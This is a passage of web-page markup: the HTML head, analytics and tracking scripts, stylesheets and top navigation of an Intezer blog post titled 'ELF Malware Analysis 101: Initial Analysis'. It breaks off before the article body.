<!DOCTYPE html>
<html lang="en-US">
<head>
	
<style>.async-hide { opacity: 0 !important} </style> <script>(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.start=1*new Date; h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')}; (a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);h.timeout=c; })(window,document.documentElement,'async-hide','dataLayer',4000, {'GTM-KC95766':true});</script>

<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-KC95766');</script>

    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="icon" type="image/png" href="https://149520725.v2.pressablecdn.com/wp-content/themes/intezer-v2/fav.png" />
     
    <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=128260767783916&ev=PageView&noscript=1" /></noscript> 
     
	<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

	
	<title>ELF Malware Analysis 101: Initial Analysis - Intezer</title>
	<meta name="description" content="In this article we will pursue ELF file analysis with an emphasis on static analysis. The purpose of initial analysis is to gather as many insights about a file as possible without spending too much time on advanced analysis techniques." />
	<link rel="canonical" href="https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/" />
	<meta property="og:locale" content="en_US" />
	<meta property="og:type" content="article" />
	<meta property="og:description" content="In this article we will pursue ELF file analysis with an emphasis on static analysis. The purpose of initial analysis is to gather as many insights about a file as possible without spending too much time on advanced analysis techniques." />
	<meta property="og:url" content="https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/" />
	<meta property="og:site_name" content="Intezer" />
	<meta property="article:publisher" content="https://www.facebook.com/IntezerLabs/" />
	<meta property="article:published_time" content="2020-08-19T14:29:06+00:00" />
	<meta property="article:modified_time" content="2022-03-27T13:21:16+00:00" />
	<meta property="og:image" content="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1.jpg" />
	<meta property="og:image:width" content="1024" />
	<meta property="og:image:height" content="512" />
	<meta property="og:image:type" content="image/jpeg" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:creator" content="@IntezerLabs" />
	<meta name="twitter:site" content="@IntezerLabs" />
	<meta name="twitter:label1" content="Written by" />
	<meta name="twitter:data1" content="Avigayil Mechtinger" />
	<meta name="twitter:label2" content="Est. reading time" />
	<meta name="twitter:data2" content="25 minutes" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.intezer.com/#organization","name":"Intezer","url":"https://www.intezer.com/","sameAs":["https://www.facebook.com/IntezerLabs/","https://www.linkedin.com/company/intezer-labs/","https://www.youtube.com/channel/UCt5L5ztHh-C1NCKa6bKjXFQ","https://twitter.com/IntezerLabs"],"logo":{"@type":"ImageObject","@id":"https://www.intezer.com/#logo","inLanguage":"en-US","url":"https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1.png","contentUrl":"https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1.png","width":512,"height":512,"caption":"Intezer"},"image":{"@id":"https://www.intezer.com/#logo"}},{"@type":"WebSite","@id":"https://www.intezer.com/#website","url":"https://www.intezer.com/","name":"Intezer","description":"","publisher":{"@id":"https://www.intezer.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.intezer.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#primaryimage","inLanguage":"en-US","url":"https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1.jpg","contentUrl":"https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1.jpg","width":1024,"height":512},{"@type":"WebPage","@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#webpage","url":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/","name":"ELF Malware Analysis 101: Initial Analysis - Intezer","isPartOf":{"@id":"https://www.intezer.com/#website"},"primaryImageOfPage":{"@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#primaryimage"},"datePublished":"2020-08-19T14:29:06+00:00","dateModified":"2022-03-27T13:21:16+00:00","description":"In this article we will pursue ELF file analysis with an emphasis on static analysis. The purpose of initial analysis is to gather as many insights about a file as possible without spending too much time on advanced analysis techniques.","breadcrumb":{"@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/"]}]},{"@type":"BreadcrumbList","@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.intezer.com/"},{"@type":"ListItem","position":2,"name":"ELF Malware Analysis 101 Part 2: Initial Analysis "}]},{"@type":"Article","@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#article","isPartOf":{"@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#webpage"},"author":{"@id":"https://www.intezer.com/#/schema/person/dcebd6e0f0881db68c1b2aad57a7f766"},"headline":"ELF Malware Analysis 101 Part 2: Initial Analysis ","datePublished":"2020-08-19T14:29:06+00:00","dateModified":"2022-03-27T13:21:16+00:00","mainEntityOfPage":{"@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#webpage"},"wordCount":4255,"publisher":{"@id":"https://www.intezer.com/#organization"},"image":{"@id":"https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-initial-analysis/#primaryimage"},"thumbnailUrl":"https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/06/shutterstock_282380951-1.jpg","keywords":["Malware Analysis"],"articleSection":["Linux","Malware Analysis"],"inLanguage":"en-US"},{"@type":"Person","@id":"https://www.intezer.com/#/schema/person/dcebd6e0f0881db68c1b2aad57a7f766","name":"Avigayil Mechtinger","image":{"@type":"ImageObject","@id":"https://www.intezer.com/#personlogo","inLanguage":"en-US","url":"https://secure.gravatar.com/avatar/a58fa1c7c5adf29f1d0e392b4d1e7212?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/a58fa1c7c5adf29f1d0e392b4d1e7212?s=96&d=mm&r=g","caption":"Avigayil Mechtinger"},"url":"https://www.intezer.com/author/avigayil/"}]}</script>
	


<link rel='dns-prefetch' href='//static.addtoany.com' />
<link rel='dns-prefetch' href='//js.hs-scripts.com' />
<link rel='dns-prefetch' href='//www.google.com' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<link href='https://fonts.gstatic.com' crossorigin rel='preconnect' />
<link rel="alternate" type="application/rss+xml" title="Intezer &raquo; Feed" href="https://www.intezer.com/feed/" />
<link rel='stylesheet' id='wp-block-library-css'  href='https://c0.wp.com/c/5.9.3/wp-includes/css/dist/block-library/style.min.css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='prismatic-blocks-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/prismatic/css/styles-blocks.css?ver=69620a8ea322898ee44dac014d43fe0a' media='all' />
<link rel='stylesheet' id='mediaelement-css'  href='https://c0.wp.com/c/5.9.3/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='https://c0.wp.com/c/5.9.3/wp-includes/js/mediaelement/wp-mediaelement.min.css' media='all' />
<style id='global-styles-inline-css' type='text/css'>
body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
</style>
<link rel='stylesheet' id='contact-form-7-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.6' media='all' />
<link rel='stylesheet' id='bootstrap_css-css'  href='https://149520725.v2.pressablecdn.com/wp-content/themes/intezer-v2/css/bootstrap.css?ver=69620a8ea322898ee44dac014d43fe0a' media='all' />
<link rel='stylesheet' id='fontawesome_css-css'  href='https://149520725.v2.pressablecdn.com/wp-content/themes/intezer-v2/css/font-awesome.min.css?ver=69620a8ea322898ee44dac014d43fe0a' media='all' />
<link rel='stylesheet' id='main_css-css'  href='https://149520725.v2.pressablecdn.com/wp-content/themes/intezer-v2/style.css?ver=1650349380' media='all' />
<link rel='stylesheet' id='wpdreams-asl-basic-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/ajax-search-lite/css/style.basic.css?ver=4.9.5' media='all' />
<link rel='stylesheet' id='wpdreams-ajaxsearchlite-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/ajax-search-lite/css/style-curvy-blue.css?ver=4.9.5' media='all' />
<link rel='stylesheet' id='slb_core-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/simple-lightbox/client/css/app.css?ver=2.8.1' media='all' />
<link rel='stylesheet' id='addtoany-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.16' media='all' />
<link rel='stylesheet' id='cf7cf-style-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.1.2' media='all' />
<link   rel='preload' as='style' data-wpacu-preload-it-async='1' onload="this.onload=null;this.rel='stylesheet'" id='wpacu-preload-jetpack_css-css'  href='https://149520725.v2.pressablecdn.com/wp-content/plugins/jetpack/css/jetpack.css?ver=10.9-a.5' media='all' />






<link rel="https://api.w.org/" href="https://www.intezer.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.intezer.com/wp-json/wp/v2/posts/11599" />			
			
			
						
		<style type='text/css'>img#wpstats{display:none}</style>
					<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
				<link rel="preload" as="style" href="//fonts.googleapis.com/css?family=Open+Sans&display=swap" />
				<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Open+Sans&display=swap" media="all" />
							<style type="text/css">
				/* If html does not have either class, do not show lazy loaded images. */
				html:not( .jetpack-lazy-images-js-enabled ):not( .js ) .jetpack-lazy-image {
					display: none;
				}
			</style>
			
		                <style>
                    
					@font-face {
						font-family: 'aslsicons2';
						src: url('https://www.intezer.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.eot');
						src: url('https://www.intezer.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.eot?#iefix') format('embedded-opentype'),
							 url('https://149520725.v2.pressablecdn.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.woff2') format('woff2'),
							 url('https://www.intezer.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.woff') format('woff'),
							 url('https://www.intezer.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.ttf') format('truetype'),
							 url('https://www.intezer.com/wp-content/plugins/ajax-search-lite/css/fonts/icons2.svg#icons') format('svg');
						font-weight: normal;
						font-style: normal;
					 font-display:swap;}
					div[id*='ajaxsearchlitesettings'].searchsettings .asl_option_inner label {
						font-size: 0px !important;
						color: rgba(0, 0, 0, 0);
					}
					div[id*='ajaxsearchlitesettings'].searchsettings .asl_option_inner label:after {
						font-size: 11px !important;
						position: absolute;
						top: 0;
						left: 0;
						z-index: 1;
					}
					div[id*='ajaxsearchlite'].wpdreams_asl_container {
						width: 100%;
						margin: 0px 0px 14px 0px;
					}
					div[id*='ajaxsearchliteres'].wpdreams_asl_results div.resdrg span.highlighted {
						font-weight: bold;
						color: rgba(48, 138, 255, 1);
						background-color: rgb(255, 255, 255);
					}
					div[id*='ajaxsearchliteres'].wpdreams_asl_results .results div.asl_image {
						width: 84px;
						height: 60px;
						background-size: cover;
						background-repeat: no-repeat;
					}
					div.asl_r .results {
						max-height: none;
					}
				
						.asl_m .probox svg {
							fill: rgba(204, 216, 228, 1) !important;
						}
						.asl_m .probox .innericon {
							background-color: rgba(255, 255, 255, 1) !important;
							background-image: none !important;
							-webkit-background-image: none !important;
							-ms-background-image: none !important;
						}
					
						div.asl_m.asl_w {
							border:1px solid rgba(48, 138, 255, 1) !important;border-radius:7px 7px 7px 7px !important;
							box-shadow: none !important;
						}
						div.asl_m.asl_w .probox {border: none !important;}
					
						div.asl_r.asl_w.vertical .results .item::after {
							display: block;
							position: absolute;
							bottom: 0;
							content: '';
							height: 1px;
							width: 100%;
							background: #D8D8D8;
						}
						div.asl_r.asl_w.vertical .results .item.asl_last_item::after {
							display: none;
						}
					 div.asl_m.asl_w {
    margin: auto;
    max-width: 820px;
}
div.asl_w .probox .promagnifier {
    order: 1;
}
div.asl_r .results .item .asl_content h3, div.asl_r .results .item .asl_content h3 a {
    font-weight: 600;
    color: #233b52;
}

div.asl_r .results .item .asl_content h3 a:hover {
    font-weight: 600;
    color: #233b52;
}

.wpdreams_asl_results .results div.asl_image {
    border-radius: 7px;
}

p.asl_desc {
    color: #849eb5;
}
span.asl_nores_header {
    font-size: 14px;
}                </style>
                			
            <link rel="icon" href="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1-32x32.png" sizes="32x32" />
<link rel="icon" href="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon" href="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1-180x180.png" />
<meta name="msapplication-TileImage" content="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/cropped-intezer-blue-1-270x270.png" />
<link rel="stylesheet" type="text/css" id="wp-custom-css" href="https://www.intezer.com/?custom-css=79c8f516d6" />



</head>

<body class="post-template-default single single-post postid-11599 single-format-standard wp-custom-logo elf-malware-analysis-101-initial-analysis elementor-default elementor-kit-8921">
<script> !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '128260767783916'); // Insert your pixel ID here. fbq('track', 'PageView'); </script>
<script type='text/javascript' id='media-video-jwt-bridge-js-extra'>
/* <![CDATA[ */
var videopressAjax = {"ajaxUrl":"https:\/\/www.intezer.com\/wp-admin\/admin-ajax.php","bridgeUrl":"https:\/\/www.intezer.com\/wp-content\/plugins\/jetpack\/modules\/videopress\/js\/videopress-token-bridge.js"};
/* ]]> */
</script>
<script   type='text/javascript' src='https://149520725.v2.pressablecdn.com/wp-content/plugins/jetpack/modules/videopress/js/videopress-token-bridge.js?ver=6' id='media-video-jwt-bridge-js'></script>
<script   type='text/javascript' id='addtoany-core-js-before'>
window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={};
</script>
<script   type='text/javascript' async src='https://static.addtoany.com/menu/page.js' id='addtoany-core-js'></script>
<script   type='text/javascript' src='https://149520725.v2.pressablecdn.com/wp-content/themes/intezer-v2/js/jquery-3.2.1.min.js?ver=69620a8ea322898ee44dac014d43fe0a' id='jquery-js'></script>
<script   data-wpacu-apply-media-query='screen and (min-width: 1024px)' type='text/javascript' async wpacu-addtoany-jquery-src='https://149520725.v2.pressablecdn.com/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1' id='addtoany-jquery-js'></script>
<script>
function wpacu_addtoany_jquery_match_media(wpacu_addtoany_jquery_match_media_var) {
    if (wpacu_addtoany_jquery_match_media_var.matches) {
        var wpacuSrcAttr = document.querySelectorAll("[wpacu-addtoany-jquery-src]")[0].getAttribute('wpacu-addtoany-jquery-src');
        document.querySelectorAll("[wpacu-addtoany-jquery-src]")[0].setAttribute('src', wpacuSrcAttr); 
    }
}
try { var wpacu_addtoany_jquery_match_media_var = window.matchMedia("screen and (min-width: 1024px)"); wpacu_addtoany_jquery_match_media(wpacu_addtoany_jquery_match_media_var); wpacu_addtoany_jquery_match_media_var.addListener(wpacu_addtoany_jquery_match_media); }
catch (wpacuError) {
  	var wpacuHrefAttr = document.querySelectorAll("[wpacu-addtoany-jquery-src]")[0].getAttribute('wpacu-addtoany-jquery-src');
    document.querySelectorAll("[wpacu-addtoany-jquery-src]")[0].setAttribute('href', wpacuHrefAttr); 
}
</script>
<script type="text/javascript">
				var _hsq = _hsq || [];
				_hsq.push(["setContentType", "blog-post"]);
			</script>
<script>
				(function() {
					var hbspt = window.hbspt = window.hbspt || {};
					hbspt.forms = hbspt.forms || {};
					hbspt._wpFormsQueue = [];
					hbspt.enqueueForm = function(formDef) {
						if (hbspt.forms && hbspt.forms.create) {
							hbspt.forms.create(formDef);
						} else {
							hbspt._wpFormsQueue.push(formDef);
						}
					};
					if (!window.hbspt.forms.create) {
						Object.defineProperty(window.hbspt.forms, 'create', {
							configurable: true,
							get: function() {
								return hbspt._wpCreateForm;
							},
							set: function(value) {
								hbspt._wpCreateForm = value;
								while (hbspt._wpFormsQueue.length) {
									var formDef = hbspt._wpFormsQueue.shift();
									if (!document.currentScript) {
										var formScriptId = 'leadin-forms-v2-js';
										hubspot.utils.currentScript = document.getElementById(formScriptId);
									}
									hbspt._wpCreateForm.call(hbspt.forms, formDef);
								}
							},
						});
					}
				})();
			</script>
<script>
				document.documentElement.classList.add(
					'jetpack-lazy-images-js-enabled'
				);
			</script>
<script type="text/javascript">
                if ( typeof _ASL !== "undefined" && _ASL !== null && typeof _ASL.initialize !== "undefined" ) {
					_ASL.initialize();
				}
            </script>
<script id="wpacu-preload-async-css-fallback">
/*! LoadCSS. [c]2020 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/
(function(w){"use strict";var wpacuLoadCSS=function(href,before,media,attributes){var doc=w.document;var ss=doc.createElement('link');var ref;if(before){ref=before}else{var refs=(doc.body||doc.getElementsByTagName('head')[0]).childNodes;ref=refs[refs.length-1]}
var sheets=doc.styleSheets;if(attributes){for(var attributeName in attributes){if(attributes.hasOwnProperty(attributeName)){ss.setAttribute(attributeName,attributes[attributeName])}}}
ss.rel="stylesheet";ss.href=href;ss.media="only x";function ready(cb){if(doc.body){return cb()}
setTimeout(function(){ready(cb)})}
ready(function(){ref.parentNode.insertBefore(ss,(before?ref:ref.nextSibling))});var onwpaculoadcssdefined=function(cb){var resolvedHref=ss.href;var i=sheets.length;while(i--){if(sheets[i].href===resolvedHref){return cb()}}
setTimeout(function(){onwpaculoadcssdefined(cb)})};function loadCB(){if(ss.addEventListener){ss.removeEventListener("load",loadCB)}
ss.media=media||"all"}
if(ss.addEventListener){ss.addEventListener("load",loadCB)}
ss.onwpaculoadcssdefined=onwpaculoadcssdefined;onwpaculoadcssdefined(loadCB);return ss};if(typeof exports!=="undefined"){exports.wpacuLoadCSS=wpacuLoadCSS}else{w.wpacuLoadCSS=wpacuLoadCSS}}(typeof global!=="undefined"?global:this))
</script>
<script async src="https://www.googletagmanager.com/gtag/js?id=AW-725468766"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'AW-725468766');
</script>


<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-KC95766"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>

    <div class="background-pop"></div>
    <header id="header">
        <nav class="navbar navbar-toggleable-sm navbar-inverse bg-faded fixed-top" id="main-menu">
                <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse"
                        data-target="#top-navbar" aria-controls="top-navbar" aria-expanded="false"
                        aria-label="Toggle navigation">
                    <span class="navbar-toggler-icon"></span>
                </button>
                <a class="navbar-brand" href="https://www.intezer.com/">
                    <a class="logo-link" href="https://www.intezer.com"><img class="logo-img" width="100" height="25" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/05/intezer-logo-n.png" alt="intezer"></a>                </a>
                <div class="collapse navbar-collapse" id="top-navbar">
                    <ul id="menu-top-menu" class="navbar-nav ml-auto"><li id="menu-item-13604" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13604 nav-item"><a class="nav-link" href="https://www.intezer.com/intezer-analyze/">Product</a></li>
<li id="menu-item-131" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-131 nav-item dropdown"><a class="nav-link dropdown-toggle" href="javascript:void(0);" data-toggle="dropdown" aria-haspopup="true">Learn </a>
<ul role="menu" class="dropdown-menu">
	<li id="menu-item-15962" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-15962 nav-item"><a class="nav-link" href="https://www.intezer.com/blog/">Blog</a></li>
	<li id="menu-item-1368" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1368 nav-item"><a class="nav-link" href="https://www.intezer.com/resources/">Resources</a></li>
	<li id="menu-item-15894" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15894 nav-item"><a class="nav-link" target="_blank" href="https://support.intezer.com/hc/en-us">Docs &#038; API</a></li>
</ul>
</li>
<li id="menu-item-20994" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-20994 nav-item dropdown"><a class="nav-link dropdown-toggle" href="javascript:void(0);" data-toggle="dropdown" aria-haspopup="true">Company </a>
<ul role="menu" class="dropdown-menu">
	<li id="menu-item-70" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-70 nav-item"><a class="nav-link" href="https://www.intezer.com/about/">About</a></li>
